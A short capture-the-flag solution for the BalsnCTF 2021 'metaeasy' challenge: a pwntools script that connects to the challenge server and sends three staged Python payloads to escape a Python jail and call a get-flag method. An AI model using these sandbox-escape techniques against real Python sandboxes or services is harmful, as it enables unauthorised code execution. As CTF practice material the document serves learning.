Summary: Bypass the restrictions of a Python jail to gain access to a get flag function within an impossible-to-instantiate metaclass class.

```
from pwn import *

def create_method(p, key, value):
'''Creates a method.
'''
p.sendline(b'2')
p.sendline(key)
p.sendline(value)
p.recvuntil(b'Option ?')

def use_method(p, key):
'''Uses a method.
'''
p.sendline(b'2')
p.sendline(key)
p.recvuntil(b'calling method')

def main():
# p = process(["python", "./dist/src/challenge.py"])
p = connect('metaeasy.balsnctf.com', 19092)

p.recvuntil(b'Option ?')

stageA = b"s=self;e='\\x5f'*2;s.N={e+'init'+e:print}"
stageB = b"s=self;s.O=type('',(MasterMetaClass,),s.N)"
stageC = b"self.O('',(),{}).IWantGETFLAGPlz(0)"

create_method(p, b'A', stageA)
create_method(p, b'B', stageB)
create_method(p, b'C', stageC)

for i in [b'A', b'B', b'C']:
use_method(p, i)

p.recvuntil(b'Here you go, my master\n')
flag = p.recvline().strip()

log.success('Flag: {}'.format(flag.decode()))

if __name__ == '__main__':
main()
```

Full writeup here: [https://nandynarwhals.org/balsnctf-2021-metaeasy/](https://nandynarwhals.org/balsnctf-2021-metaeasy/)